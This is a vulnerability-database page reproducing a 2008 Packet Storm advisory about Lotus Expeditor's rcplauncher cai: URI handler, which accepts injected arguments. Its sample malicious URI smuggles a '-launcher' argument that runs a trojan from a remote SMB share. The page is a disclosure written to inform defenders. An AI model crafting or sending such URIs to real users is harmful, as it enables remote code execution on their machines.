Lucene search

K

lotus-exec.txt

🗓️ 24 Apr 2008 00:00:00Reported by Thomas PolletType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 19 Views

Lotus expeditor rcplauncher registers cai: uri handler, allowing execution of arbitrary code

Show more

5 of 5AI Insights are available for you today

Leverage the power of AI to quickly understand vulnerabilities, impacts, and exploitability

Code
`Hello,  
  
I have found that the lotus expeditor rcplauncher as installed by lotus  
symphony and possibly other products, registers a cai: uri handler.  
This handler executes  
"D:\Program Files\IBM\Lotus\Symphony\framework\rcp\rcplauncher.exe" -config  
notes -com.ibm.rcp.portal.app.ui#openCA "%1"  
the rcplauncher process accepts various arguments which can be abused to  
execute arbitrary code.  
The argument to the -launcher option for example is an executable that will  
be executed.  
  
malicious uri example:  
cai:"%20-launcher%20\\6.6.6.6\d$\trojan  
  
Regards,  
Thomas Pollet <http://thomas.pollet.googlepages.com/>  
`

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo
24 Apr 2008 00:00Current
7.4High risk
Vulners AI Score7.4
19
.json
Report